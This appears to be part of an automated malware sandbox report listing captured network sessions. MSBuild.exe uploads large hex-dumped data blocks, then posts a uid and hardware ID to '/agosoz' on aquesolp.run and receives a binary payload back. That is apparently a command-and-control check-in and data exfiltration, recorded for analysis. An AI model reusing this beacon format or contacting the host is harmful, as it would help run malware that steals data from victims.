                                          2025-04-11 23:45:11 UTC15331OUTData Raw: bc 9a 8d 56 9a 33 77 7d cb 10 6b 6e 39 53 05 73 1a 26 f6 6f d4 74 35 25 10 f1 c3 85 a1 7e 14 f0 eb 1e 74 8d 6e 21 5f 55 bd 82 91 84 45 5d e8 ae 84 ca 3f 2b f6 03 23 e4 de a5 0a 74 42 43 63 67 0f a1 37 5f 88 f8 3f 2f f8 06 63 fb 6c 77 f6 8d a4 52 91 d6 f3 81 8a 07 46 49 f9 8d 85 b3 e7 91 1c d4 74 96 ce b0 79 e8 fb 2f 00 78 0c 90 36 54 d9 21 ad d6 4b 86 58 d3 c3 83 2c 04 be 07 47 6f 2b fb 9c 5b 11 fb 54 60 ca bc 95 d9 42 29 55 cf 72 2a 26 ce df 30 82 6b 30 0b 24 49 39 49 89 b4 d5 92 77 60 26 1e 4a 56 fc 95 cd 31 e1 cb 33 86 cb e0 06 9d 29 01 af 29 87 94 bf 0e 9c a8 9a f2 ce 83 ea 35 ba 4c 71 e5 53 e5 d6 72 92 b8 38 1e 15 12 16 55 05 fd c0 82 93 86 f4 2c f1 f0 2a 4c 21 8d 07 94 75 9d 8e ae c0 68 96 48 74 c4 71 6b b1 18 68 2d 77 eb 8a 17 07 29 40 e7 ba 86 04
                                          Data Ascii: V3w}kn9Ss&ot5%~tn!_UE]?+#tBCcg7_?/clwRFIty/x6T!KX,Go+[T`B)Ur*&0k0$I9Iw`&JV13))5LqSr8U,*L!uhHtqkh-w)@
                                          2025-04-11 23:45:11 UTC15331OUTData Raw: 04 3c 3a ae 7f eb fb 01 28 d1 81 73 93 45 b3 56 e6 38 51 c1 1b 88 b4 94 4e 28 c7 99 72 73 01 02 2b cd b3 e6 55 18 2f 39 3c a6 4e d6 c8 f2 df 1d 6f 6e f9 6b 5f e3 dd d0 d4 dc 47 cf 11 75 e5 3e cc 4e 52 ba a6 66 c8 96 35 36 5e 28 08 e0 42 47 54 0b 82 e3 f1 d6 44 37 4a 4a 60 00 54 d3 9a a8 ea 51 43 b3 53 92 37 27 ff c4 99 11 78 d5 e1 39 9e 25 19 42 14 8b c7 f2 c6 2a e1 fd 2a 24 e5 6e 70 9a c4 ef f7 80 8f 02 46 9b 99 fc 9b eb fa 70 7f 14 33 9c 76 95 b2 1c 5c 59 d2 15 1b cd 00 af e1 96 ee 9b 2a 8a ed 90 db eb c8 31 ae d8 15 fa 5a b8 54 86 af 57 14 ea 72 19 9b fe e8 ac b5 d5 14 76 20 77 e9 eb 6e 28 e7 d2 4e 1f 9b 03 ab 6c ee 29 eb 9a 73 72 02 b8 06 4c 74 52 cc 29 e8 6d fd 47 1d 4c bf ad bc 6f 38 b4 33 29 2c 2a bf 12 43 20 ba b5 95 c0 7e 71 e9 20 b9 f2 59 a8 fd
                                          Data Ascii: <:(sEV8QN(rs+U/9<Nonk_Gu>NRf56^(BGTD7JJ`TQCS7'x9%B**$npFp3v\Y*1ZTWrv wn(Nl)srLtR)mGLo83),*C ~q Y
                                          2025-04-11 23:45:11 UTC15331OUTData Raw: eb bd 36 53 35 96 e1 5d 90 fb 51 9c b3 e7 b4 96 c6 2e 13 5b 68 41 29 72 48 c7 6e e7 ca 9d a4 6f 43 5f 3a bd d7 07 1b 80 68 63 73 2d 58 49 a3 81 b7 37 28 8c bc 41 9b eb 41 90 dd d3 bf 58 27 95 10 e0 14 74 e2 d5 4e 89 fc 40 6d 98 2a 5b 2c 33 a8 31 51 78 b9 fb 0a 2d a2 4b 59 3d cc bd 58 13 11 29 cc a9 f9 22 dd 43 58 ea 2e 70 22 82 33 ef ee 86 96 ba 26 59 dc e1 63 ee 91 fe a7 24 a1 f0 37 c4 74 96 28 93 a8 c6 21 94 b6 59 43 cf 32 5c 8c f2 64 61 fa 9f 88 cb 40 7d 08 82 42 55 f7 56 c0 29 f2 67 fd 1d e3 71 5a b7 0c 7b fe 66 c3 db 4d 42 d8 ee 6e ee dd 28 23 e4 74 45 1f 6d d2 12 e7 ab f1 fb 02 cf 48 03 53 6f 78 89 49 9d ea 1a e9 02 80 a3 80 6f 49 37 f0 66 32 7b 19 18 9c 5d fc 25 96 0f da 6d 05 5f e2 ed a4 ac 9c 82 58 33 de 1d dd 79 30 2b d5 8c 04 e9 c6 dd 7d 43 21
                                          Data Ascii: 6S5]Q.[hA)rHnoC_:hcs-XI7(AAX'tN@m*[,31Qx-KY=X)"CX.p"3&Yc$7t(!YC2\da@}BUV)gqZ{fMBn(#tEmHSoxIoI7f2{]%m_X3y0+}C!
                                          2025-04-11 23:45:11 UTC15331OUTData Raw: 8a bd 52 11 8c 54 fb 45 5a 3f 42 2d 2e 1c 8a b2 f9 97 cf d2 ab 52 f6 f2 23 18 99 20 e4 72 a5 e4 bb ae ef 68 7f 21 38 c4 34 37 4e 68 2b a7 31 0d c3 0c da e8 09 ef 95 80 27 f7 c9 30 cc cd 3e aa 73 f2 9c af 08 1a 85 60 5a d0 ff 9d 8b 4d 4f a8 06 98 29 f0 2f 44 91 d8 89 5c d8 56 79 3f e1 5c 78 49 a1 f7 52 3e 46 9b 3a 07 a9 1b 77 77 00 71 47 e9 2c f1 37 33 f1 42 c0 9f 62 5f 05 f8 30 e4 72 bb da 6a 92 4c d5 c9 32 d0 df 79 5a ce 66 e9 33 e5 9a 46 84 f3 9b 8a b2 47 09 9a 00 ac 2c 1f 9c 15 89 ff c4 f5 c8 ac 64 a0 d4 9b 00 49 3c 81 42 16 0b 91 62 2f 3c c0 b6 b8 dc 66 34 9d b9 87 04 e1 84 6b 00 8a 74 60 5b 4c a2 89 5f 67 c4 ed 57 db e4 79 de ab b7 a1 f6 94 3c 5e 4d c5 f5 0c b7 fd b8 89 0d 79 87 69 e1 33 dd 17 d6 e1 dd 52 74 15 bc b8 40 14 98 16 4a 75 b4 d2 73 f2 40
                                          Data Ascii: RTEZ?B-.R# rh!847Nh+1'0>s`ZMO)/D\Vy?\xIR>F:wwqG,73Bb_0rjL2yZf3FG,dI<Bb/<f4kt`[L_gWy<^Myi3Rt@Jus@
                                          2025-04-11 23:45:11 UTC15331OUTData Raw: 81 32 00 a6 91 85 c4 fd b1 0b 3d 97 8a a6 8a d5 d1 ed e6 56 3c d5 b6 fc d5 d5 9e 7a c1 00 8f e3 99 32 92 96 57 44 40 6f b4 3c 29 ad 94 17 7b 22 96 5f d7 ae cb 37 b1 8c 64 24 36 f3 f1 da db 4f 66 d8 00 6d d7 b5 0d fb 16 e3 82 5d aa d8 75 42 6d 4d 6c f6 e5 17 60 36 94 a7 14 39 15 3b 0e 4b ff c4 64 b9 f1 5f cd ea 00 a9 40 17 37 2a d9 1a da 6b f6 9d 5d 66 8d 7d 83 d7 0a 81 02 97 aa 85 3a 3d f6 53 8a 7a ab 0c ac f1 82 5e 0c 94 fb c3 ec 1a f9 8d e1 3c 0d af dd f1 a3 26 53 3f ad ee 87 b4 99 94 07 3a fc 78 d1 fd 0f 88 e6 13 8c 14 a7 4d dd cf b0 ad 38 64 a3 b4 52 d1 20 1b e7 b1 4b bf 82 ea b1 09 75 21 89 0f 90 8b 1f ba dc ed 6d 69 40 78 e2 5e 46 79 27 2f 0c 7d 26 50 a4 04 fe 7e 2e da d3 10 7e 37 17 c7 78 7a 6a a6 ac b9 ea 89 cd 40 92 1f dc 5c cd 83 d3 93 47 49 21
                                          Data Ascii: 2=V<z2WD@o<){"_7d$6Ofm]uBmMl`69;Kd_@7*k]f}:=Sz^<&S?:xM8dR Ku!mi@x^Fy'/}&P~.~7xzj@\GI!
                                          2025-04-11 23:45:11 UTC15331OUTData Raw: a3 82 60 c5 5f 4f 83 8b e5 2e e1 2f 93 91 47 9b 0c 03 9e c2 66 db 87 1c 1c 72 dc 75 d4 de a0 4a a9 dc c1 da ae 2a 42 71 46 1f 74 02 8c b9 25 9f 01 9f aa 1e 95 2c 0f 80 39 e5 7a 6e bc 0f 22 83 d5 20 2d e7 8c 11 0c 59 c1 8e 5d d1 48 e4 07 02 b7 0c fc 25 71 2a 43 27 96 72 3a 4f 4a 02 30 c1 49 72 0b 9c bb 71 ab e5 3c 7e 59 71 74 77 e7 c1 20 81 5c 0e a1 16 71 3c 65 65 72 5c f7 49 6b e5 2e eb 94 63 96 50 46 7a c0 f2 4a 32 b7 4d a7 cc 48 38 77 e2 a3 3d b3 b2 c5 aa 60 97 1d 7e 4d 68 67 aa 91 1c 3a 42 51 13 5e 5d 28 2a c0 0a ac 17 64 bd a8 04 ea 0b 06 d6 84 ea f5 19 72 dd 5f b9 21 2a 07 1c 4e d4 bc f0 37 fb 95 ee b8 17 e9 34 85 d2 4b ad 3c 18 30 68 16 ac 81 9d 71 dc 67 9a d6 7b ba 19 ad da 90 f2 77 68 61 ed 27 49 18 29 99 0c 17 31 f4 e9 2e 29 04 5e 87 af b5 4b ac
                                          Data Ascii: `_O./GfruJ*BqFt%,9zn" -Y]H%q*C'r:OJ0Irq<~Yqtw \q<eer\Ik.cPFzJ2MH8w=`~Mhg:BQ^](*dr_!*N74K<0hqg{wha'I)1.)^K
                                          2025-04-11 23:45:11 UTC15331OUTData Raw: 61 bc 45 48 e1 da 7f 44 57 26 66 62 d0 b1 58 bd 1b a9 51 83 40 89 6b f7 a6 df 0a 6f 59 0f 6c d6 e9 e2 52 a3 f6 3b 42 99 b3 c3 a1 53 4d c3 ac ba f7 2a 7c a6 23 24 83 98 f1 08 7f d6 14 c7 b2 db c7 d6 da 7b fb f3 cf 5c 1d ff c1 d6 04 d2 c3 07 ce 0c a6 23 9e bd c5 ae b9 ee 1f c0 65 07 6b 9d 0e 1a ca 46 d3 33 19 1c 7d 42 94 09 e7 49 5b d4 ac 28 8a b0 5e 6e 65 6d ac f9 44 5b b7 c7 3e bc f9 1d 24 b4 74 91 66 35 83 b9 3e f3 e4 23 f2 d0 bb 60 b1 2d e4 27 71 4e 16 0d 3b e1 ed 03 4a c3 45 6e 68 da 28 fc 59 8a 4c d2 10 ea 03 c1 28 f7 40 48 9d 4c 4c 60 b5 1a cf 59 12 a3 ed c7 69 69 7d 4b 63 31 a7 83 f6 45 8c dc c1 dc 08 a3 f0 5c ef fd f6 9b 39 9d 5b 51 d5 e1 37 af 00 05 30 27 89 a8 2e 76 4e 78 62 63 de 71 73 cf 7e d3 79 85 82 90 9c f6 ad 77 2a 63 8b 7d 38 55 cd 7e df
                                          Data Ascii: aEHDW&fbXQ@koYlR;BSM*|#${\#ekF3}BI[(^nemD[>$tf5>#`-'qN;JEnh(YL(@HLL`Yii}Kc1E\9[Q70'.vNxbcqs~yw*c}8U~
                                          2025-04-11 23:45:11 UTC15331OUTData Raw: 7d 9f cb 52 5d d4 f3 42 fb e2 d3 7e c2 52 25 be 0c 7d 03 bd ec d4 81 7f 83 0e 9e 03 27 0e 8a c8 da 46 29 0e 7d ab c6 2a 3e 3f d2 90 69 5e 9f 50 99 ca 37 5b 8c a5 e7 0c 07 3a e2 d3 d0 b8 15 5e e1 64 ba 23 b8 87 9d bc 29 70 14 6f 1c c4 4c de 5c a4 eb a4 e7 c0 fc 51 99 10 29 8b c5 0a 08 98 90 a6 83 73 27 ce 8d cf 8c 46 6f 9e de f9 7c 9c 19 9b d3 72 20 cf 71 59 e6 5f ab d5 a3 18 0c 42 8f 43 90 89 7e 6f e4 4a cf 5d 79 59 08 3f 5a 17 95 ab fd f3 7a d7 24 a6 c0 e0 ab f8 78 1a 1b 57 06 92 18 92 cb a0 62 92 39 50 7b 69 31 24 24 c0 fd 6c fb ff 23 ff 5b bd c3 94 94 36 67 3c 90 ea bf bb 1d bc 5b 9d c9 74 ed 76 49 38 fb d1 9f f4 27 9a 89 88 a2 45 0d 22 95 cc a7 f4 8a d1 20 a7 fa b2 a9 ab 29 b5 68 11 f5 73 d6 38 f5 2f 14 fd 99 b2 54 e6 c8 85 4b e3 3e 35 fc 3f aa ea 03
                                          Data Ascii: }R]B~R%}'F)}*>?i^P7[:^d#)poL\Q)s'Fo|r qY_BC~oJ]yY?Zz$xWb9P{i1$$l#[6g<[tvI8'E" )hs8/TK>5?
                                          2025-04-11 23:45:11 UTC15331OUTData Raw: 13 ec a4 2e a8 a3 f8 55 3c 8b 35 1b de b4 97 1f c1 fd 91 6e ce 3a dd 1c 4a ad b4 3c d6 b2 6c c2 6f fd 9a 95 0a ff af 25 9e 84 3d a8 11 ce e3 5e 9c 8d 3a 73 a3 ee 87 b2 aa d7 b7 d3 0e 30 9a 4d c7 19 08 15 7d a7 01 49 00 29 90 f1 80 45 6e 69 d9 4d 40 87 79 4f fe 60 1d 22 bb 87 d6 93 7b e0 a5 36 70 2b 82 9d cb 90 8b 77 09 10 33 70 5d 06 77 fe fd 4f 8a cd db b4 99 b3 78 8d d2 e5 22 13 fc 86 2a 2a 98 b9 00 5e cd 0c 81 7c 9d 8b 6d 59 84 09 bf e7 26 1d cd 55 62 89 a6 44 c4 ec e8 0b b8 36 17 fd 76 8c 68 28 0f 0b e0 af ba 60 bd 17 a8 0b 14 72 c5 43 6b dc a2 f1 5d 40 b3 af 66 0d f7 08 3e 63 f9 a8 22 dd e3 b7 c3 67 b2 58 bb 27 e0 7c d4 a7 71 d9 59 86 3d fb 08 de a2 51 e3 54 73 01 e1 01 78 23 f8 12 15 2f 8f e0 98 87 57 7b b8 5a 4d ce 8a 10 b7 2f 41 04 80 8a 80 0d 22
                                          Data Ascii: .U<5n:J<lo%=^:s0M}I)EniM@yO`"{6p+w3p]wOx"**^|mY&UbD6vh(`rCk]@f>c"gX'|qY=QTsx#/W{ZM/A"
                                          2025-04-11 23:45:13 UTC808INHTTP/1.1 200 OK
                                          Date: Fri, 11 Apr 2025 23:45:13 GMT
                                          Content-Type: application/json
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Vary: Accept-Encoding
                                          cf-cache-status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F2f2t2Us0YnJAWcbtNebuMMNNnmZLSXgC2d0oTA5QyhmGkCGGIpNhyajrfzHFKCac12txkGTRAysm%2BhbnzQ6AAeOcQPm465Se0OQiGwxncBB3wL6PSZGZGSPSvvYqjw%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 92ee5b308a0dd6f4-IAD
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=122053&min_rtt=121378&rtt_var=26283&sent=234&recv=434&lost=0&retrans=0&sent_bytes=2825&recv_bytes=572942&delivery_rate=33244&cwnd=252&unsent_bytes=0&cid=f37b61b866261f27&ts=1768&x=0"


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          7192.168.2.549700104.21.22.104437396C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                          TimestampBytes transferredDirectionData
                                          2025-04-11 23:45:13 UTC264OUTPOST /agosoz HTTP/1.1
                                          Connection: Keep-Alive
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                          Content-Length: 103
                                          Host: aquesolp.run
                                          2025-04-11 23:45:13 UTC103OUTData Raw: 75 69 64 3d 64 65 31 34 34 35 65 31 32 61 66 35 64 35 63 32 61 62 62 64 33 65 33 63 64 37 64 39 35 36 37 34 64 63 36 30 33 31 34 66 33 35 63 63 32 30 62 64 39 62 34 39 39 36 32 37 26 63 69 64 3d 26 68 77 69 64 3d 43 42 45 43 46 38 34 35 35 44 44 36 36 36 37 30 36 45 37 36 38 34 32 43 42 46 44 30 32 39 41 41
                                          Data Ascii: uid=de1445e12af5d5c2abbd3e3cd7d95674dc60314f35cc20bd9b499627&cid=&hwid=CBECF8455DD666706E76842CBFD029AA
                                          2025-04-11 23:45:14 UTC783INHTTP/1.1 200 OK
                                          Date: Fri, 11 Apr 2025 23:45:14 GMT
                                          Content-Type: application/octet-stream
                                          Content-Length: 11224
                                          Connection: close
                                          cf-cache-status: DYNAMIC
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8UB%2FyxF6RGYFgJ6vWQX0bYy7wWMK4sPNiwX0q8E1YMrdt%2F5FpypMThCuzVZx6pwvKm%2BDDGKK9Z8e6Jw4Ma7jX4C3V0UcnZ2Z7oZtuemKfkJ0PQGS2PRBuzjSgETGtmA%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          Server: cloudflare
                                          CF-RAY: 92ee5b3ddee7c002-ATL
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=106095&min_rtt=106053&rtt_var=22435&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1003&delivery_rate=38027&cwnd=252&unsent_bytes=0&cid=713fd411ecfab23e&ts=586&x=0"
                                          2025-04-11 23:45:14 UTC586INData Raw: 49 de 8e ef f6 70 4b 32 92 63 f8 f6 e5 86 30 8f 1a 83 55 93 4e 41 5f 10 8c 02 62 5e 38 b6 e7 3c 2d b0 8c 17 ef 55 a6 b5 3e 7a a2 a2 be e2 59 b6 f9 2d 32 37 67 2b 30 34 6d ff 91 95 98 16 fb 4b ce 21 e7 1b f8 63 20 d6 81 7f df 42 49 39 29 13 19 56 6f 32 d1 02 eb d5 65 86 1b fa f1 59 86 69 b1 c4 ba cd f5 ad 65 ec 4f 92 85 35 cb 6a 25 2c 1a 09 33 a7 9e 91 bf 8a 6f c4 5f dc dd bf 83 2b 4d b5 01 c4 63 50 34 dc 31 93 fe 70 77 be 25 f4 36 6d 32 bc 6b 3a f7 69 8b 1a 7d 62 c3 66 a1 f0 21 74 f1 a1 a3 e0 75 1b ef 34 13 c8 82 67 b7 a4 3a 5e 6d a9 6b 39 0c a6 64 b5 54 94 fb ae ad be df 8f a5 9c 21 f1 3e 43 97 d8 60 fc fd 45 9e 40 75 7b 4f 58 8c 94 5d 98 d2 df 5f f6 45 57 1d 33 df fc 41 06 45 5a 8e 13 aa 4b 58 c3 5b bc 8c 1a c3 b9 02 79 2b 65 23 d3 b5 67 8e 4e bd d3 43
                                          Data Ascii: IpK2c0UNA_b^8<-U>zY-27g+04mK!c BI9)Vo2eYieO5j%,3o_+McP41pw%6m2k:i}bf!tu4g:^mk9dT!>C`E@u{OX]_EW3AEZKX[y+e#gNC
                                          2025-04-11 23:45:14 UTC1369INData Raw: 23 da 0d 57 18 c9 59 b6 35 4d 74 2a 2b 5d 8d 0b 37 15 f6 84 54 cf fd 6a d9 52 3d 21 83 2a 7a 46 09 5e 33 3f 35 50 a9 79 f0 5d f0 17 f3 f6 ff 6d 22 34 16 d6 ec 61 41 5f c1 15 2f 59 20 41 3e cf 6b ed a4 85 13 c0 4c b1 40 ff 13 80 08 d2 e1 6b 16 44 27 6f 18 09 43 9b e1 53 a1 da 7e 90 92 54 4c f5 17 80 68 9d 74 2c ac 1d a5 e3 08 59 f3 2d 8f e1 12 78 14 17 8a f4 a0 82 46 ca c7 d5 67 4c 51 98 4f 57 39 fd 82 67 5b 23 cf c5 3d 7f 16 6d b1 b3 a3 33 a4 3c d0 8e fb 62 b3 fc 21 95 83 23 82 b7 1b 85 b7 b5 52 79 4a dd a6 18 5f a8 70 b4 f2 df e9 cf 89 26 a9 e0 6f ff 3b 7c ea 98 d9 36 b7 ae 84 06 3b 88 85 67 30 fa 28 d6 80 5c 56 2e 90 71 7e 06 36 69 d4 2b 2b 5e a8 4f e4 41 d4 60 a7 f9 d3 6a 18 8f ce 38 bd a1 37 f3 07 5b 9d ed 53 c2 35 a9 9f 64 28 3f e9 9b 14 fc cf 83 3b
                                          Data Ascii: #WY5Mt*+]7TjR=!*zF^3?5Py]m"4aA_/Y A>kL@kD'oCS~TLht,Y-xFgLQOW9g[#=m3<b!#RyJ_p&o;|6;g0(\V.q~6i++^OA`j87[S5d(?;
                                          2025-04-11 23:45:14 UTC1369INData Raw: 55 ad 88 0b 98 e1 a2 3b 97 45 05 a1 41 6e 4c a5 f7 45 37 25 d6 d4 e2 0b 75 b8 07 71 eb 23 b7 d4 d4 10 fe 9c c5 2d 4c 31 fc 67 44 6f 55 2e 08 a2 b5 27 7c 81 56 fd ee cd 11 a8 9b 10 f7 89 ab 50 68 b5 68 e5 ef f4 4c e4 00 b2 53 b3 1b 11 da 7d 3f 00 87 ce 96 41 3f 16 97 29 0b ec f4 92 0f fd 91 d0 e3 be 3a 44 62 d4 9f 1d 42 06 12 6a 0a b6 a1 c9 93 dd dc 10 21 d8 03 b0 95 96 66 00 89 3b a7 72 ca 41 d7 ad b1 82 2f 40 eb f6 83 3b c8 aa a5 14 65 ac c0 ec f5 10 88 8a 06 eb c5 dd 5e 19 33 9c 05 f5 94 91 f0 d0 8f 09 e5 87 24 e0 ce 83 83 6b 03 1e 42 76 36 28 ad 2a 94 90 bf 0a 8b 8f 06 84 b8 b0 ed e3 ef 61 e1 78 2a ec 50 ab ac 0b ee 7b ab 0b 9c a0 7a d8 1f 68 24 00 c3 7b 9b 42 30 f7 a4 45 4e c3 7d 95 dc 9c 53 bc f7 91 40 a3 43 fa 39 b3 00 91 64 c9 70 31 1e 70 07 17 a9
                                          Data Ascii: U;EAnLE7%uq#-L1gDoU.'|VPhhLS}?A?):DbBj!f;rA/@;e^3$kBv6(*ax*P{zh${B0EN}S@C9dp1p
                                          2025-04-11 23:45:14 UTC1369INData Raw: 3b 6c 34 aa 31 31 ae e1 80 77 94 9d f4 b1 24 fe a2 6b 92 17 ed 0a c9 d2 45 13 92 a1 22 7b 9e ac eb 97 7c a6 ab 0a 0e a1 1a 31 69 42 31 7f 95 99 f3 0e 56 52 30 5b ae ad d5 00 32 8d a8 5b 9a 8b 86 a2 10 7e 8a 8a 1b 3b 7c f0 a8 64 cf 1f 51 54 e0 bc 89 d5 92 74 5c 52 3c 2d 04 b0 7c 1a 02 b3 48 a8 d4 1e b8 4e c8 67 40 a6 49 ed c7 21 32 82 60 2d 50 37 2e c7 e0 d3 98 cd 77 d7 08 09 10 12 2a 6c cd dd 6f 00 bf 39 88 d4 61 8e 11 a9 c8 08 88 d2 db 42 b8 11 a8 45 e3 09 b5 a3 33 88 84 f2 4f 84 02 08 98 d5 b0 81 28 3d 65 c4 16 60 a8 98 80 82 af ce 77 78 de 89 03 6f 28 64 b1 dc 50 b2 b4 61 52 f2 c6 72 fa 41 54 51 10 53 1d d8 2f f2 7d 13 df 8f ab 0f 1a 86 ee 8f 28 e2 76 11 e4 7c fa 99 03 01 74 70 82 0e ae cd df c9 ba 48 e0 78 ea e3 55 b9 b6 f2 06 48 26 c0 d8 b7 fc 05 1b
                                          Data Ascii: ;l411w$kE"{|1iB1VR0[2[~;|dQTt\R<-|HNg@I!2`-P7.w*lo9aBE3O(=e`wxo(dPaRrATQS/}(v|tpHxUH&
                                          2025-04-11 23:45:14 UTC1369INData Raw: 42 f6 1f ce 9b 02 43 6a 49 b8 92 71 c7 e8 73 61 98 e6 fd 4e a1 c4 15 e7 73 18 4d f6 31 a5 c4 4b fd 37 43 19 73 e0 31 c6 14 33 fc 84 40 f8 46 93 7e 66 67 92 9d 44 04 fa b8 6b 5e 34 bf ab 3c 4a 4c bd 7b bf 26 57 46 b7 88 f1 bd d5 83 06 1e 53 98 0c 06 12 b1 47 91 17 ee b0 9b 8d ff 7e 59 45 64 75 f6 76 df b5 b1 14 fc dc af 20 b9 99 ba ff bc 7f 24 f0 87 51 95 9f c7 80 e5 4f 4f de 46 bf 9c 04 df 9f c5 27 b3 e3 b1 6f c0 6d 3c 57 c1 f1 ec 99 b5 ef 11 24 10 7c ac 71 09 f0 82 20 fd 95 d3 0d 14 01 21 be 4c 17 8f 77 24 55 21 71 88 c7 9a 50 46 1d 2c 6e 5f f8 4a fa 0e ea 85 6c 09 3a 1e 5a 6d e8 31 19 a7 cd 01 cd a7 8c cc ca b6 b0 00 17 c4 4b 79 f7 05 e2 78 c1 42 2d 2f 5d 70 9d 4a 17 e0 00 55 f7 a5 79 33 3e 07 83 2a 86 7a ed ee ab 33 ed 3c 5e 7f 9b 98 00 16 02 b9 d9 8d
                                          Data Ascii: BCjIqsaNsM1K7Cs13@F~fgDk^4<JL{&WFSG~YEduv $QOOF'om<W$|q !Lw$U!qPF,n_Jl:Zm1KyxB-/]pJUy3>*z3<^
                                          2025-04-11 23:45:14 UTC1369INData Raw: 99 58 ff 17 72 7d 6e 4d d8 cf aa 51 0c 34 99 d4 06 ba 07 a8 32 26 f5 86 fa ff 37 93 62 ab c7 81 d0 91 6f f9 ae 51 8b bc fd 61 f5 e3 fe de 79 e9 49 36 41 60 6d eb 95 f0 aa ec 36 9e 4d 69 fd d2 7d b5 8d 1f 8b 48 41 15 37 c5 4a f5 24 b7 ae b0 10 86 60 8a 76 80 dc c6 4c e3 e3 4f 9c 10 2a a0 b5 4a ba d1 76 47 3e 95 fa aa 9f c5 56 dc cd f3 c7 43 2a 2e 50 13 33 18 9d 4e 7e 19 57 2e 1d 41 1c 79 87 92 f3 b8 c6 68 67 85 53 79 9c 29 fa 53 8a a2 2e 12 d6 65 86 5e ee fb c0 db eb 8a 45 d6 6e 56 63 90 65 a1 91 da 2f 35 d4 4a 1c 59 77 9f 67 88 04 fa 1f 95 72 6b 7a 1d 2c aa c1 be a7 ad 20 af ea c0 22 f1 fc b0 a1 4b 93 76 ed b7 83 71 6c d1 6f 96 4f f6 34 95 af dd 8d 93 3b ff b6 62 3f ba 41 e8 41 9a 5f ba 55 5d f0 42 04 b5 c6 69 00 24 39 c4 6e 11 4e 57 f6 18 d4 08 33 59 bf
                                          Data Ascii: Xr}nMQ42&7boQayI6A`m6Mi}HA7J$`vLO*JvG>VC*.P3N~W.AyhgSy)S.e^EnVce/5JYwgrkz, "KvqloO4;b?AA_U]Bi$9nNW3Y
                                          2025-04-11 23:45:14 UTC1369INData Raw: a7 bf 01 7e b3 6a a5 0f 1e a8 38 f6 d7 07 bb 46 51 d3 34 cb 18 4b fd 0a 24 71 1a c1 d2 1b 12 8e d8 fc 2f e0 ba df 34 77 04 30 fa 97 66 d9 f0 fe bd ae 84 25 fd 99 fa 09 26 c5 42 fa 0c 88 62 b4 64 ea 8f c1 8b d8 50 4a 87 46 3c 14 50 9c 76 3f be 3d 6a a3 ab 16 5c 13 2a 2b 86 9a 94 46 42 3a 3c 52 2f fa 3b 27 3a 22 9a e5 7d 1c 05 a7 dc 81 8f 81 11 f7 16 5b 77 61 e5 2c fc f2 34 32 2b 50 b1 87 af bc 97 cc 88 7b 76 8f 80 36 11 e3 0c 09 f3 84 72 7d 16 94 85 35 80 c5 61 b0 33 2c 0c 3a c6 b8 52 ec f7 56 40 5b 7f e4 e1 12 a8 fd dc 4b 69 a7 75 e6 d7 35 d4 f3 3f 6b 6a 1b 49 e2 3d 6b 7c 31 5a 26 e9 76 ab f5 cf 42 5a 35 8b 64 c0 28 7c f4 24 08 e0 52 46 5b 4c de a0 4f 64 5d 71 8e 09 35 19 fa 00 b7 48 43 4b de 78 73 77 5d 2c 87 8c 08 a8 3f a2 f5 8c ee 93 fe 83 f9 ba 03 98
                                          Data Ascii: ~j8FQ4K$q/4w0f%&BbdPJF<Pv?=j\*+FB:<R/;':"}[wa,42+P{v6r}5a3,:RV@[Kiu5?kjI=k|1Z&vBZ5d(|$RF[LOd]q5HCKxsw],?
                                          2025-04-11 23:45:14 UTC1369INData Raw: df c8 2a 05 93 c6 a1 9f 75 6b 94 56 09 02 8f 5e 0e 5f 4d 23 77 5d 03 7a b4 8e 29 a1 e0 cd 41 e4 75 26 e8 85 60 f3 f4 6a ed 9b db 09 98 86 b4 c4 bb 52 cc af cf 6a ca a1 e6 c3 1c 3d 84 63 30 de 83 4f 89 50 51 47 73 c9 fd 5e c4 9f e8 d9 ae 5a 83 59 bb 44 13 83 f7 e4 b6 ef c9 76 cd 86 44 82 38 8b 4d 50 f3 8a e7 d6 25 55 45 36 aa 8e a3 27 9e cc 7e b8 36 f0 c3 63 3a f9 e6 d3 d5 9e 69 33 93 ee a7 d4 d8 85 f7 c7 e7 66 ce bb d2 c2 88 45 3f 7c 10 a6 a2 10 61 18 44 f9 b7 93 ef 06 aa 64 68 ac b4 a3 58 92 54 54 13 58 f0 15 1f 79 ab 0f 25 bb ae 57 be 5a 8f 52 de 83 6e d8 81 32 76 a6 de d7 f2 36 6e 3c 3b 97 d3 41 61 42 92 98 a3 62 1e 8f ed d2 60 14 7f dc a9 81 20 66 71 f2 02 71 4d 80 45 30 46 f1 b1 7b 4a 8b 86 5e b5 e8 0d 4e 96 db 48 08 61 27 96 3a 10 a9 db 5c d0 0d 5f
                                          Data Ascii: *ukV^_M#w]z)Au&`jRj=c0OPQGs^ZYDvD8MP%UE6'~6c:i3fE?|aDdhXTTXy%WZRn2v6n<;AaBb` fqqME0F{J^NHa':\_
